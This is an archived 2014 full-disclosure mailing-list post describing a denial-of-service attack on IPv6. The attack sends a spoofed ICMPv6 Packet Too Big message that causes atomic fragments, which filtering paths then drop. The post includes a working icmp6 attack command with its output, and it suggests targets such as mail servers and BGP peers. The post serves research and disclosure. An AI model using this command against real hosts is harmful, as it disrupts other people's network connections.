[<prev] [next>] [day] [month] [year] [list]
Message-ID: <53F688B7.8020503@si6networks.com>
Date: Thu, 21 Aug 2014 21:03:03 -0300
From: Fernando Gont <fgont@...networks.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
fulldisclosure@...lists.org
Subject: [FD] DoS attacks (ICMPv6-based) resulting from IPv6 EH drops
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Folks,
Ten days ago or so we published this I-D:
<http://www.ietf.org/internet-drafts/draft-gont-v6ops-ipv6-ehs-in-real-world-00.txt>
Section 5.2 of the I-D discusses a possible attack vector based on a
combination of "forged" ICMPv6 PTB messages and IPv6 frag drops by
operators, along with proposed countermeasures -- but let me offer a
more informal and practical explanation:
1) It is known that filtering of packets containing IPv6 Extension
Headers (including the Fragment Header) is widespread (see our I-D above)
2) Let us assume that Host A is communicating with Server B, and that
some node filters fragments between Host A and Server B.
3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
MTU<1280), in the hopes of eliciting "atomic fragments" (see
<http://tools.ietf.org/rfc/rfc6946.txt>) from now on.
4) Now server B starts sending IPv6 atomic fragments... And since they
include a frag header (and in '2)' above we noted that frags are dropped
on that path), these packets get dropped (i.e., DoS).
"Demo" with the icmp6 tool
(<http://www.si6networks.com/tools/ipv6toolkit>) -- (some addresses have
been changed (anonymized), but it is trivial to pick a victim server...)
"2001:db8:1:10:0:1991:8:25" is the server, and
"2001:5c0:1000:a::840" is my own address):
- ---- cut here ----
***** First of all, I telnet to port 80 of the server, and
everything works as expected ****
fgont@...ellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25...
Connected to 2001:db8:1:10:0:1991:8:25.
Escape character is '^]'.
^CConnection closed by foreign host.
**** Now I send the forget ICMPv6 PTB ****
fgont@...ellite:~$ sudo icmp6 --icmp6-packet-too-big -d
2001:db8:1:10:0:1991:8:25 --peer-addr 2001:5c0:1000:a::840 --mtu 1000 -o
80 -v
icmp6: Security assessment tool for attack vectors based on ICMPv6 error
messages
IPv6 Source Address: 2001:5c0:1000:a::840 (automatically selected)
IPv6 Destination Address: 2001:db8:1:10:0:1991:8:25
IPv6 Hop Limit: 227 (randomized)
ICMPv6 Packet Too Big (Type 2), Code 0
Next-Hop MTU: 1000
Payload Type: IPv6/TCP (default)
Source Address: 2001:db8:1:10:0:1991:8:25 (automatically-selected)
Destination Address: 2001:5c0:1000:a::840
Hop Limit: 237 (randomized)
Source Port: 80 Destination Port: 38189 (randomized)
SEQ Number: 734463213 (randomized) ACK Number: 866605720 (randomized)
Flags: A (default) Window: 18944 (randomized) URG Pointer: 0 (default)
Initial attack packet(s) sent successfully.
***** And now I try the same telnet command as above... but it fails,
because the frags from the server to me are getting dropped somewhere ****
fgont@...ellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25...
[timeout]
- ---- cut here ----
Of course, in this particular case we just "shot ourselves". But one
could do this to DoS connections between mailservers, etc.
A nice question is: what if e.g....
1) some BGP servers accept ICMPv6 PTB that claim an MTU < 1280, and
react (as expected) by generating atomic fragments, *and*,
2) These same BGP servers deem fragmentation as "harmful", and hence
drop such fragments
you could essentially DoS traffic between them.
*******************************************************************
JOIN US at the next edition of our "Hacking IPv6 Networks" training
course in Leipzig, Germany. : February 2-3, 2015.
More info available at:
<https://www.it-defense.de/en/it-defense-2015/trainings/hacking-ipv6-networks/>
*******************************************************************
- --
Fernando Gont
SI6 Networks
e-mail: fgont@...networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAEBAgAGBQJT9oizAAoJEK4lDVUdTnSS9xIQAKaDyPAqxmtdzhKXOU1t3NqQ
JD4XAfXWe6FnJCpYwCfj7SQWCxYUUx+i06DXrKQu/7NM4Qwi+f/D41MTzc8a27rF
Mn9mKwhicgAJO8iOgxGfr5y/BfKg0RwyLhc7GSYZLT5AVeBwb02Zfs2NA1uQZ2ak
AaFJJw2kjFZv6ynsPQ8L7MDoA0ixTqXrUV81iz9Wug5jkMkUk9Fm9RdbbZiHIWe5
57Y13+ZYWHDDPySf6UrJaXGn/S3JaUsy1jY+QPOppl+grsKBtNMuDcCM0TkMLq+b
cAYM41bN3NtILSxd5R2EayecehQYa4qSBYOGf/JPE8j0LepH8Wp99LdKkldCZA0B
Ja85ZlbOz/kA1SCymDTvnIVA47Wt6TFItG1s0OhTrms0qEfs6Mu1hz8zuARL5eOF
PPtJbAnmWMAl4mKHbTJb2a7BCs5NtcBdknBPJWJhcoqfnRedSiOsUYpHjsmNMdQn
wzdAaCDaSz3bfWbK37WPeusjA2+GfS/28jP4dOK3g3kPTy/Oml4kLKKPQ+wP8eO5
/i3aXjCMAJ8R5A7mnqVygz1IVLacMq8NclyFV/seTEnMNTulvnNUitBNFf+loYA/
2+M5E+iAa/K1yeUcMoocZ+L3W+ml1yxgXE/50P0EOOHN7f/YK6Q+H2FHB45E0/wf
NpYbne5sFlb9xmOEiD4e
=YSDa
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists